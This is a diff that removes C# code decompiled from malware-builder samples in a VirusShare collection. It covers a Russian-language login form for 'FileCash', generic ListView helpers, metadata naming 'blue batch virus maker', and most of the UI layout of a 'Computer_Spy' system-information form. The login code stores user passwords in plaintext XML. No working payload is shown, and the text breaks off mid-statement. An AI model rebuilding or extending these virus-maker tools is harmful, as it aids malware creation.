this.SaveMyLP.AutoSize = true;
this.SaveMyLP.Location = new Point(95, 88);
this.SaveMyLP.Name = "SaveMyLP";
this.SaveMyLP.Size = new Size(164, 17);
this.SaveMyLP.TabIndex = 3;
this.SaveMyLP.Text = "Сохранить учетные данные";
this.SaveMyLP.UseVisualStyleBackColor = true;
this.PasswordEbox.Location = new Point(95, 62);
this.PasswordEbox.Name = "PasswordEbox";
this.PasswordEbox.PasswordChar = '*';
this.PasswordEbox.Size = new Size(224, 20);
this.PasswordEbox.TabIndex = 2;
this.label2.AutoSize = true;
this.label2.Location = new Point(22, 62);
this.label2.Name = "label2";
this.label2.Size = new Size(48, 13);
this.label2.TabIndex = 2;
this.label2.Text = "Пароль:";
this.label1.AutoSize = true;
this.label1.Location = new Point(22, 34);
this.label1.Name = "label1";
this.label1.Size = new Size(41, 13);
this.label1.TabIndex = 1;
this.label1.Text = "Логин:";
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(336, 177);
this.Controls.Add((Control) this.groupBox1);
this.FormBorderStyle = FormBorderStyle.FixedSingle;
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (auth);
this.SizeGripStyle = SizeGripStyle.Hide;
this.Text = "Авторизация";
this.groupBox1.ResumeLayout(false);
this.groupBox1.PerformLayout();
this.ResumeLayout(false);
}
public auth()
{
this.InitializeComponent();
if (!File.Exists(this.FCashObj.SavedPassXml) || !(File.ReadAllText(this.FCashObj.SavedPassXml, Encoding.UTF8) != ""))
return;
this.xmldoc = new XmlDocument();
this.xmldoc.Load(this.FCashObj.SavedPassXml);
this.xmlnode = this.xmldoc.GetElementsByTagName("acc");
for (int i = 0; i < this.xmlnode.Count; ++i)
this.LoginEbox.Items.Add((object) this.xmlnode[i].ChildNodes.Item(0).InnerText);
this.LoginEbox.SelectedIndex = 0;
this.PasswordEbox.Text = this.xmlnode[0].ChildNodes.Item(1).InnerText;
}
private void login_Click(object sender, EventArgs e)
{
this.FCashObj.GetSID(this.FCashObj.DomainIP + "/start.php");
if (this.FCashObj.SID == null)
return;
this.FCashObj.HDD_Serial = "";
this.FCashObj.OS_Version = "3.3";
if (new Regex("^[A-Za-z0-9_]{2,30}$").IsMatch(this.LoginEbox.Text) && this.PasswordEbox.Text.Length >= 4)
{
this.FCashObj.Login = this.LoginEbox.Text;
this.FCashObj.Password = this.PasswordEbox.Text;
string input1 = this.FCashObj.SendPost(this.FCashObj.DomainIP + "/auth.php", "sid=" + this.FCashObj.SID + "&login=" + this.FCashObj.Login + "&password=" + HttpUtility.UrlEncode(this.FCashObj.Password) + "&hardware=" + this.FCashObj.HDD_Serial + "&version=" + this.FCashObj.OS_Version);
if (input1 == null)
return;
switch (input1)
{
case "erAut":
int num1 = (int) MessageBox.Show("Не правильный логин или пароль!", "Ошибка авторизации", MessageBoxButtons.OK, MessageBoxIcon.Hand);
break;
case "erAutSId":
case "erAutId":
case "erAutVer":
int num2 = (int) MessageBox.Show("Произошла ошибка при авторизации!", "Ошибка авторизации", MessageBoxButtons.OK, MessageBoxIcon.Hand);
break;
default:
string text = (string) null;
string str = (string) null;
Match match1 = new Regex("msgAutOk=\"([0-9]*)\"").Match(input1);
if (match1.Groups[1] != null)
this.FCashObj.USERID = Convert.ToInt32(match1.Groups[1].ToString());
Match match2 = new Regex("msgtextau=\"(.*)\",").Match(input1);
if (match2.Groups[1] != null)
text = match2.Groups[1].ToString();
Match match3 = new Regex("lastauth=\"(.*)\"").Match(input1);
if (match3.Groups[1] != null)
this.FCashObj.LastAuth = match3.Groups[1].ToString();
Match match4 = new Regex("closeau=\"(.*)\"").Match(input1);
if (match4.Groups[1].ToString() == "1")
str = match4.Groups[1].ToString();
if (text != "")
{
int num3 = (int) MessageBox.Show(text);
}
if (str != null)
Application.Exit();
if (this.SaveMyLP.Checked)
{
if (!Directory.Exists(this.FCashObj.SavedPassFolder))
Directory.CreateDirectory(this.FCashObj.SavedPassFolder);
FileStream fileStream = File.Open(this.FCashObj.SavedPassXml, FileMode.OpenOrCreate, FileAccess.ReadWrite);
fileStream.Close();
bool flag = false;
string input2 = File.ReadAllText(this.FCashObj.SavedPassXml, Encoding.UTF8);
if (input2 != "")
{
this.xmlnode = this.xmldoc.GetElementsByTagName("acc");
for (int i = 0; i < this.xmlnode.Count; ++i)
{
if (this.xmlnode[i].ChildNodes.Item(0).InnerText.ToLower() == this.LoginEbox.Text.ToLower())
{
if (this.PasswordEbox.Text != this.xmlnode[i].ChildNodes.Item(1).InnerText)
{
input2 = Regex.Replace(input2, "<uname>" + this.xmlnode[i].ChildNodes.Item(0).InnerText + "</uname><sec>" + this.xmlnode[i].ChildNodes.Item(1).InnerText + "</sec>", "<uname>" + this.LoginEbox.Text.ToLower() + "</uname><sec>" + this.PasswordEbox.Text + "</sec>", RegexOptions.IgnoreCase);
fileStream = File.Open(this.FCashObj.SavedPassXml, FileMode.Open, FileAccess.Write);
StreamWriter streamWriter = new StreamWriter((Stream) fileStream, Encoding.UTF8);
streamWriter.Write(input2);
streamWriter.Flush();
fileStream.Close();
}
flag = true;
break;
}
}
}
else
input2 = "<all>";
if (!flag)
{
fileStream = File.Open(this.FCashObj.SavedPassXml, FileMode.Open, FileAccess.Write);
StreamWriter streamWriter = new StreamWriter((Stream) fileStream, Encoding.UTF8);
streamWriter.WriteLine(input2.Replace("</all>", "") + "<acc><uname>" + this.LoginEbox.Text.ToLower() + "</uname><sec>" + this.PasswordEbox.Text + "</sec></acc></all>");
streamWriter.Flush();
}
fileStream.Close();
}
this.Hide();
new Form1(ref this.FCashObj).Show();
break;
}
}
else
{
int num = (int) MessageBox.Show("Укажите имя пользователя и пароль", "Ошибка авторизации", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
}
private void LoginEbox_SelectedIndexChanged(object sender, EventArgs e) => this.PasswordEbox.Text = this.xmlnode[this.LoginEbox.SelectedIndex].ChildNodes.Item(1).InnerText;
private void linkLabel1_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e) => Process.Start("http://ccdev1.ru/reg.php");
}
}

View File

@ -1,181 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: ListViewEmbeddedControls.ListViewEx
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System;
using System.Collections;
using System.ComponentModel;
using System.Drawing;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace ListViewEmbeddedControls
{
public class ListViewEx : ListView
{
private const int LVM_FIRST = 4096;
private const int LVM_GETCOLUMNORDERARRAY = 4155;
private const int WM_PAINT = 15;
private ArrayList _embeddedControls = new ArrayList();
[DllImport("user32.dll")]
private static extern IntPtr SendMessage(IntPtr hWnd, int msg, IntPtr wPar, IntPtr lPar);
protected int[] GetColumnOrder()
{
IntPtr num = Marshal.AllocHGlobal(Marshal.SizeOf(typeof (int)) * this.Columns.Count);
if (ListViewEx.SendMessage(this.Handle, 4155, new IntPtr(this.Columns.Count), num).ToInt32() == 0)
{
Marshal.FreeHGlobal(num);
return (int[]) null;
}
int[] destination = new int[this.Columns.Count];
Marshal.Copy(num, destination, 0, this.Columns.Count);
Marshal.FreeHGlobal(num);
return destination;
}
protected Rectangle GetSubItemBounds(ListViewItem Item, int SubItem)
{
Rectangle subItemBounds = Rectangle.Empty;
if (Item == null)
throw new ArgumentNullException(nameof (Item));
int[] columnOrder = this.GetColumnOrder();
if (columnOrder == null)
return subItemBounds;
if (SubItem >= columnOrder.Length)
throw new IndexOutOfRangeException("SubItem " + (object) SubItem + " out of range");
Rectangle bounds = Item.GetBounds(ItemBoundsPortion.Entire);
int left = bounds.Left;
int index;
for (index = 0; index < columnOrder.Length; ++index)
{
ColumnHeader column = this.Columns[columnOrder[index]];
if (column.Index != SubItem)
left += column.Width;
else
break;
}
subItemBounds = new Rectangle(left, bounds.Top, this.Columns[columnOrder[index]].Width, bounds.Height);
return subItemBounds;
}
public void AddEmbeddedControl(Control c, int col, int row) => this.AddEmbeddedControl(c, col, row, DockStyle.Fill);
public void AddEmbeddedControl(Control c, int col, int row, DockStyle dock)
{
ListViewEx.EmbeddedControl embeddedControl;
embeddedControl.Control = c;
embeddedControl.Column = col;
embeddedControl.Row = row;
embeddedControl.Dock = dock;
embeddedControl.Item = this.Items[row];
this._embeddedControls.Add((object) embeddedControl);
c.Click += new EventHandler(this._embeddedControl_Click);
this.Controls.Add(c);
}
public void RemoveEmbeddedControl(Control c)
{
if (c == null)
throw new ArgumentNullException();
for (int index = 0; index < this._embeddedControls.Count; ++index)
{
if (((ListViewEx.EmbeddedControl) this._embeddedControls[index]).Control == c)
{
c.Click -= new EventHandler(this._embeddedControl_Click);
this.Controls.Remove(c);
this._embeddedControls.RemoveAt(index);
return;
}
}
throw new Exception("Control not found!");
}
public Control GetEmbeddedControl(int col, int row)
{
foreach (ListViewEx.EmbeddedControl embeddedControl in this._embeddedControls)
{
if (embeddedControl.Row == row && embeddedControl.Column == col)
return embeddedControl.Control;
}
return (Control) null;
}
[DefaultValue(View.LargeIcon)]
public new View View
{
get => base.View;
set
{
foreach (ListViewEx.EmbeddedControl embeddedControl in this._embeddedControls)
embeddedControl.Control.Visible = value == View.Details;
base.View = value;
}
}
protected override void WndProc(ref Message m)
{
if (m.Msg == 15 && this.View == View.Details)
{
foreach (ListViewEx.EmbeddedControl embeddedControl in this._embeddedControls)
{
Rectangle subItemBounds = this.GetSubItemBounds(embeddedControl.Item, embeddedControl.Column);
if (this.HeaderStyle != ColumnHeaderStyle.None && subItemBounds.Top < this.Font.Height)
{
embeddedControl.Control.Visible = false;
}
else
{
embeddedControl.Control.Visible = true;
switch (embeddedControl.Dock)
{
case DockStyle.None:
subItemBounds.Size = embeddedControl.Control.Size;
break;
case DockStyle.Top:
subItemBounds.Height = embeddedControl.Control.Height;
break;
case DockStyle.Bottom:
subItemBounds.Offset(0, subItemBounds.Height - embeddedControl.Control.Height);
subItemBounds.Height = embeddedControl.Control.Height;
break;
case DockStyle.Left:
subItemBounds.Width = embeddedControl.Control.Width;
break;
case DockStyle.Right:
subItemBounds.Offset(subItemBounds.Width - embeddedControl.Control.Width, 0);
subItemBounds.Width = embeddedControl.Control.Width;
break;
}
embeddedControl.Control.Bounds = subItemBounds;
}
}
}
base.WndProc(ref m);
}
private void _embeddedControl_Click(object sender, EventArgs e)
{
foreach (ListViewEx.EmbeddedControl embeddedControl in this._embeddedControls)
{
if (embeddedControl.Control == (Control) sender)
{
this.SelectedItems.Clear();
embeddedControl.Item.Selected = true;
}
}
}
private struct EmbeddedControl
{
public Control Control;
public int Column;
public int Row;
public DockStyle Dock;
public ListViewItem Item;
}
}
}

View File

@ -1,29 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: ListViewSorter.ImageTextComparer
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System.Collections;
using System.Windows.Forms;
namespace ListViewSorter
{
public class ImageTextComparer : IComparer
{
private NumberCaseInsensitiveComparer ObjectCompare;
public ImageTextComparer() => this.ObjectCompare = new NumberCaseInsensitiveComparer();
public int Compare(object x, object y)
{
ListViewItem listViewItem1 = (ListViewItem) x;
int imageIndex1 = listViewItem1.ImageIndex;
ListViewItem listViewItem2 = (ListViewItem) y;
int imageIndex2 = listViewItem2.ImageIndex;
if (imageIndex1 < imageIndex2)
return -1;
return imageIndex1 == imageIndex2 ? this.ObjectCompare.Compare((object) listViewItem1.Text, (object) listViewItem2.Text) : 1;
}
}
}

View File

@ -1,49 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: ListViewSorter.ListViewColumnSorter
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System.Collections;
using System.Windows.Forms;
namespace ListViewSorter
{
public class ListViewColumnSorter : IComparer
{
private int ColumnToSort;
private SortOrder OrderOfSort;
private NumberCaseInsensitiveComparer ObjectCompare;
private ImageTextComparer FirstObjectCompare;
public ListViewColumnSorter()
{
this.ColumnToSort = 0;
this.OrderOfSort = SortOrder.Ascending;
this.ObjectCompare = new NumberCaseInsensitiveComparer();
this.FirstObjectCompare = new ImageTextComparer();
}
public int Compare(object x, object y)
{
ListViewItem listViewItem1 = (ListViewItem) x;
ListViewItem listViewItem2 = (ListViewItem) y;
int num = this.ColumnToSort != 0 ? this.ObjectCompare.Compare((object) listViewItem1.SubItems[this.ColumnToSort].Text, (object) listViewItem2.SubItems[this.ColumnToSort].Text) : this.FirstObjectCompare.Compare(x, y);
if (this.OrderOfSort == SortOrder.Ascending)
return num;
return this.OrderOfSort == SortOrder.Descending ? -num : 0;
}
public int SortColumn
{
set => this.ColumnToSort = value;
get => this.ColumnToSort;
}
public SortOrder Order
{
set => this.OrderOfSort = value;
get => this.OrderOfSort;
}
}
}

View File

@ -1,26 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: ListViewSorter.NumberCaseInsensitiveComparer
// Assembly: FileCash_v3.0, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DECC99D-34C5-4E02-A85D-DC744B5C555A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Constructor.MSIL.ArchSMS.a-33cc8dceb24ed9df287e1f92d02773477af42b8d2b6de53a45bb9b5a3ead070b.exe
using System;
using System.Collections;
using System.Text.RegularExpressions;
namespace ListViewSorter
{
public class NumberCaseInsensitiveComparer : CaseInsensitiveComparer
{
public new int Compare(object x, object y)
{
if (x == (object) "")
x = (object) "0";
if (y == (object) "")
y = (object) "0";
return x is string && this.IsWholeNumber((string) x) && y is string && this.IsWholeNumber((string) y) ? base.Compare((object) Convert.ToInt32(x), (object) Convert.ToInt32(y)) : base.Compare(x, y);
}
private bool IsWholeNumber(string strNumber) => !new Regex("[^0-9]").IsMatch(strNumber);
}
}

View File

@ -1,13 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCopyright("Copyright © 2011")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTrademark("")]
[assembly: Guid("a882ac11-2315-441e-806c-2f52c7595e65")]
[assembly: AssemblyProduct("blue batch virus maker v 1.1")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyTitle("blue batch virus maker v 1.1")]
[assembly: ComVisible(true)]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyVersion("1.0.0.0")]

View File

@ -1,758 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.Computer_Spy
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using blue_batch_virus_maker_v_2._4.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Net;
using System.Net.NetworkInformation;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
namespace blue_batch_virus_maker_v_2._4
{
[DesignerGenerated]
public class Computer_Spy : Form
{
private static List<WeakReference> __ENCList = new List<WeakReference>();
private IContainer components;
[AccessedThroughProperty("TextBox1")]
private TextBox _TextBox1;
[AccessedThroughProperty("TextBox2")]
private TextBox _TextBox2;
[AccessedThroughProperty("TextBox3")]
private TextBox _TextBox3;
[AccessedThroughProperty("TextBox4")]
private TextBox _TextBox4;
[AccessedThroughProperty("Label1")]
private Label _Label1;
[AccessedThroughProperty("Label2")]
private Label _Label2;
[AccessedThroughProperty("Label3")]
private Label _Label3;
[AccessedThroughProperty("Label4")]
private Label _Label4;
[AccessedThroughProperty("Timer1")]
private System.Windows.Forms.Timer _Timer1;
[AccessedThroughProperty("Label5")]
private Label _Label5;
[AccessedThroughProperty("Label6")]
private Label _Label6;
[AccessedThroughProperty("TextBox5")]
private TextBox _TextBox5;
[AccessedThroughProperty("TextBox6")]
private TextBox _TextBox6;
[AccessedThroughProperty("TextBox7")]
private TextBox _TextBox7;
[AccessedThroughProperty("Label7")]
private Label _Label7;
[AccessedThroughProperty("Button1")]
private Button _Button1;
[AccessedThroughProperty("Button2")]
private Button _Button2;
[AccessedThroughProperty("Label8")]
private Label _Label8;
[AccessedThroughProperty("ListBox1")]
private ListBox _ListBox1;
[AccessedThroughProperty("Button3")]
private Button _Button3;
[AccessedThroughProperty("Button4")]
private Button _Button4;
[AccessedThroughProperty("Label9")]
private Label _Label9;
[DebuggerNonUserCode]
static Computer_Spy()
{
}
[DebuggerNonUserCode]
public Computer_Spy()
{
this.Load += new EventHandler(this.Form1_Load);
Computer_Spy.__ENCAddToList((object) this);
this.InitializeComponent();
}
[DebuggerNonUserCode]
private static void __ENCAddToList(object value)
{
lock (Computer_Spy.__ENCList)
{
if (Computer_Spy.__ENCList.Count == Computer_Spy.__ENCList.Capacity)
{
int index1 = 0;
int num = checked (Computer_Spy.__ENCList.Count - 1);
int index2 = 0;
while (index2 <= num)
{
if (Computer_Spy.__ENCList[index2].IsAlive)
{
if (index2 != index1)
Computer_Spy.__ENCList[index1] = Computer_Spy.__ENCList[index2];
checked { ++index1; }
}
checked { ++index2; }
}
Computer_Spy.__ENCList.RemoveRange(index1, checked (Computer_Spy.__ENCList.Count - index1));
Computer_Spy.__ENCList.Capacity = Computer_Spy.__ENCList.Count;
}
Computer_Spy.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
}
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.components = (IContainer) new System.ComponentModel.Container();
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (Computer_Spy));
this.TextBox1 = new TextBox();
this.TextBox2 = new TextBox();
this.TextBox3 = new TextBox();
this.TextBox4 = new TextBox();
this.Label1 = new Label();
this.Label2 = new Label();
this.Label3 = new Label();
this.Label4 = new Label();
this.Timer1 = new System.Windows.Forms.Timer(this.components);
this.Label5 = new Label();
this.Label6 = new Label();
this.TextBox5 = new TextBox();
this.TextBox6 = new TextBox();
this.TextBox7 = new TextBox();
this.Label7 = new Label();
this.Button1 = new Button();
this.Button2 = new Button();
this.Label8 = new Label();
this.ListBox1 = new ListBox();
this.Button3 = new Button();
this.Button4 = new Button();
this.Label9 = new Label();
this.SuspendLayout();
this.TextBox1.BackColor = Color.Black;
this.TextBox1.ForeColor = Color.Lime;
TextBox textBox1_1 = this.TextBox1;
Point point1 = new Point(149, 48);
Point point2 = point1;
textBox1_1.Location = point2;
this.TextBox1.Name = "TextBox1";
TextBox textBox1_2 = this.TextBox1;
Size size1 = new Size(192, 20);
Size size2 = size1;
textBox1_2.Size = size2;
this.TextBox1.TabIndex = 0;
this.TextBox1.TextAlign = HorizontalAlignment.Center;
this.TextBox2.BackColor = Color.Black;
this.TextBox2.ForeColor = Color.Lime;
TextBox textBox2_1 = this.TextBox2;
point1 = new Point(149, 74);
Point point3 = point1;
textBox2_1.Location = point3;
this.TextBox2.Name = "TextBox2";
TextBox textBox2_2 = this.TextBox2;
size1 = new Size(192, 20);
Size size3 = size1;
textBox2_2.Size = size3;
this.TextBox2.TabIndex = 1;
this.TextBox2.TextAlign = HorizontalAlignment.Center;
this.TextBox3.BackColor = Color.Black;
this.TextBox3.ForeColor = Color.Lime;
TextBox textBox3_1 = this.TextBox3;
point1 = new Point(149, 100);
Point point4 = point1;
textBox3_1.Location = point4;
this.TextBox3.Name = "TextBox3";
TextBox textBox3_2 = this.TextBox3;
size1 = new Size(192, 20);
Size size4 = size1;
textBox3_2.Size = size4;
this.TextBox3.TabIndex = 2;
this.TextBox3.TextAlign = HorizontalAlignment.Center;
this.TextBox4.BackColor = Color.Black;
this.TextBox4.ForeColor = Color.Lime;
TextBox textBox4_1 = this.TextBox4;
point1 = new Point(149, 126);
Point point5 = point1;
textBox4_1.Location = point5;
this.TextBox4.Name = "TextBox4";
TextBox textBox4_2 = this.TextBox4;
size1 = new Size(192, 20);
Size size5 = size1;
textBox4_2.Size = size5;
this.TextBox4.TabIndex = 3;
this.TextBox4.TextAlign = HorizontalAlignment.Center;
this.Label1.AutoSize = true;
this.Label1.BackColor = Color.Black;
this.Label1.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.Label1.ForeColor = Color.Lime;
Label label1_1 = this.Label1;
point1 = new Point(12, 48);
Point point6 = point1;
label1_1.Location = point6;
this.Label1.Name = "Label1";
Label label1_2 = this.Label1;
size1 = new Size(122, 16);
Size size6 = size1;
label1_2.Size = size6;
this.Label1.TabIndex = 4;
this.Label1.Text = "PhysicalMemory";
this.Label1.UseWaitCursor = true;
this.Label2.AutoSize = true;
this.Label2.BackColor = Color.Black;
this.Label2.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.Label2.ForeColor = Color.Lime;
Label label2_1 = this.Label2;
point1 = new Point(12, 78);
Point point7 = point1;
label2_1.Location = point7;
this.Label2.Name = "Label2";
Label label2_2 = this.Label2;
size1 = new Size(133, 16);
Size size7 = size1;
label2_2.Size = size7;
this.Label2.TabIndex = 5;
this.Label2.Text = "Available Memory";
this.Label2.UseWaitCursor = true;
this.Label3.AutoSize = true;
this.Label3.BackColor = Color.Black;
this.Label3.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.Label3.ForeColor = Color.Lime;
Label label3_1 = this.Label3;
point1 = new Point(12, 104);
Point point8 = point1;
label3_1.Location = point8;
this.Label3.Name = "Label3";
Label label3_2 = this.Label3;
size1 = new Size(107, 16);
Size size8 = size1;
label3_2.Size = size8;
this.Label3.TabIndex = 6;
this.Label3.Text = "VirtualMemory";
this.Label3.UseWaitCursor = true;
this.Label4.AutoSize = true;
this.Label4.BackColor = Color.Black;
this.Label4.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.Label4.ForeColor = Color.Lime;
Label label4_1 = this.Label4;
point1 = new Point(12, 130);
Point point9 = point1;
label4_1.Location = point9;
this.Label4.Name = "Label4";
Label label4_2 = this.Label4;
size1 = new Size(133, 16);
Size size9 = size1;
label4_2.Size = size9;
this.Label4.TabIndex = 7;
this.Label4.Text = "Available Memory";
this.Label4.UseWaitCursor = true;
this.Timer1.Enabled = true;
this.Label5.AutoSize = true;
this.Label5.BackColor = Color.Black;
this.Label5.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.Label5.ForeColor = Color.Lime;
Label label5_1 = this.Label5;
point1 = new Point(12, 182);
Point point10 = point1;
label5_1.Location = point10;
this.Label5.Name = "Label5";
Label label5_2 = this.Label5;
size1 = new Size(79, 16);
Size size10 = size1;
label5_2.Size = size10;
this.Label5.TabIndex = 9;
this.Label5.Text = "Your Time";
this.Label5.UseWaitCursor = true;
this.Label6.AutoSize = true;
this.Label6.BackColor = Color.Black;
this.Label6.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.Label6.ForeColor = Color.Lime;
Label label6_1 = this.Label6;
point1 = new Point(12, 156);
Point point11 = point1;
label6_1.Location = point11;
this.Label6.Name = "Label6";
Label label6_2 = this.Label6;
size1 = new Size(119, 16);
Size size11 = size1;
label6_2.Size = size11;
this.Label6.TabIndex = 8;
this.Label6.Text = "Computer Name";
this.Label6.UseWaitCursor = true;
this.TextBox5.BackColor = Color.Black;
this.TextBox5.ForeColor = Color.Lime;
TextBox textBox5_1 = this.TextBox5;
point1 = new Point(149, 178);
Point point12 = point1;
textBox5_1.Location = point12;
this.TextBox5.Name = "TextBox5";
TextBox textBox5_2 = this.TextBox5;
size1 = new Size(192, 20);
Size size12 = size1;
textBox5_2.Size = size12;
this.TextBox5.TabIndex = 11;
this.TextBox5.TextAlign = HorizontalAlignment.Center;
this.TextBox6.BackColor = Color.Black;
this.TextBox6.ForeColor = Color.Lime;
TextBox textBox6_1 = this.TextBox6;
point1 = new Point(149, 152);
Point point13 = point1;
textBox6_1.Location = point13;
this.TextBox6.Name = "TextBox6";
TextBox textBox6_2 = this.TextBox6;
size1 = new Size(192, 20);
Size size13 = size1;
textBox6_2.Size = size13;
this.TextBox6.TabIndex = 10;
this.TextBox6.TextAlign = HorizontalAlignment.Center;
this.TextBox7.BackColor = Color.Black;
this.TextBox7.ForeColor = Color.Lime;
TextBox textBox7_1 = this.TextBox7;
point1 = new Point(149, 205);
Point point14 = point1;
textBox7_1.Location = point14;
this.TextBox7.Name = "TextBox7";
TextBox textBox7_2 = this.TextBox7;
size1 = new Size(192, 20);
Size size14 = size1;
textBox7_2.Size = size14;
this.TextBox7.TabIndex = 12;
this.TextBox7.TextAlign = HorizontalAlignment.Center;
this.Label7.AutoSize = true;
this.Label7.BackColor = Color.Black;
this.Label7.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.Label7.ForeColor = Color.Lime;
Label label7_1 = this.Label7;
point1 = new Point(12, 205);
Point point15 = point1;
label7_1.Location = point15;
this.Label7.Name = "Label7";
Label label7_2 = this.Label7;
size1 = new Size(125, 16);
Size size15 = size1;
label7_2.Size = size15;
this.Label7.TabIndex = 13;
this.Label7.Text = "Local Ip Address";
this.Label7.UseWaitCursor = true;
this.Button1.BackColor = Color.Black;
this.Button1.ForeColor = Color.Lime;
Button button1_1 = this.Button1;
point1 = new Point(36, 228);
Point point16 = point1;
button1_1.Location = point16;
this.Button1.Name = "Button1";
Button button1_2 = this.Button1;
size1 = new Size(218, 23);
Size size16 = size1;
button1_2.Size = size16;
this.Button1.TabIndex = 15;
this.Button1.Text = "Get Mac Address";
this.Button1.UseVisualStyleBackColor = false;
this.Button2.BackColor = Color.Black;
this.Button2.ForeColor = Color.Lime;
Button button2_1 = this.Button2;
point1 = new Point(235, 15);
Point point17 = point1;
button2_1.Location = point17;
this.Button2.Name = "Button2";
Button button2_2 = this.Button2;
size1 = new Size(106, 23);
Size size17 = size1;
button2_2.Size = size17;
this.Button2.TabIndex = 16;
this.Button2.Text = "Back";
this.Button2.UseVisualStyleBackColor = false;
this.Label8.AutoSize = true;
this.Label8.BackColor = Color.Black;
this.Label8.Font = new Font("Microsoft Sans Serif", 11.25f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0);
this.Label8.ForeColor = Color.White;
Label label8_1 = this.Label8;
point1 = new Point(45, 16);
Point point18 = point1;
label8_1.Location = point18;
this.Label8.Name = "Label8";
Label label8_2 = this.Label8;
size1 = new Size(124, 18);
Size size18 = size1;
label8_2.Size = size18;
this.Label8.TabIndex = 17;
this.Label8.Text = "System Spy V 1.2";
this.ListBox1.BackColor = Color.Black;
this.ListBox1.ForeColor = Color.Lime;
this.ListBox1.FormattingEnabled = true;
this.ListBox1.Items.AddRange(new object[1]
{
(object) ""
});
ListBox listBox1_1 = this.ListBox1;
point1 = new Point(352, 52);
Point point19 = point1;
listBox1_1.Location = point19;
this.ListBox1.Name = "ListBox1";
ListBox listBox1_2 = this.ListBox1;
size1 = new Size(210, 199);
Size size19 = size1;
listBox1_2.Size = size19;
this.ListBox1.TabIndex = 21;
this.Button3.BackColor = Color.Black;
this.Button3.ForeColor = Color.Red;
Button button3_1 = this.Button3;
point1 = new Point(352, 23);
Point point20 = point1;
button3_1.Location = point20;
this.Button3.Name = "Button3";
Button button3_2 = this.Button3;
size1 = new Size(75, 23);
Size size20 = size1;
button3_2.Size = size20;
this.Button3.TabIndex = 22;
this.Button3.Text = "Refresh";
this.Button3.UseVisualStyleBackColor = false;
this.Button4.BackColor = Color.Black;
this.Button4.ForeColor = Color.Red;
Button button4_1 = this.Button4;
point1 = new Point(487, 23);
Point point21 = point1;
button4_1.Location = point21;
this.Button4.Name = "Button4";
Button button4_2 = this.Button4;
size1 = new Size(75, 23);
Size size21 = size1;
button4_2.Size = size21;
this.Button4.TabIndex = 23;
this.Button4.Text = "Kill";
this.Button4.UseVisualStyleBackColor = false;
this.Label9.AutoSize = true;
this.Label9.BackColor = Color.Black;
this.Label9.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Bold | FontStyle.Italic, GraphicsUnit.Point, (byte) 0);
this.Label9.ForeColor = Color.Yellow;
Label label9_1 = this.Label9;
point1 = new Point(390, 0);
Point point22 = point1;
label9_1.Location = point22;
this.Label9.Name = "Label9";
Label label9_2 = this.Label9;
size1 = new Size(148, 20);
Size size22 = size1;
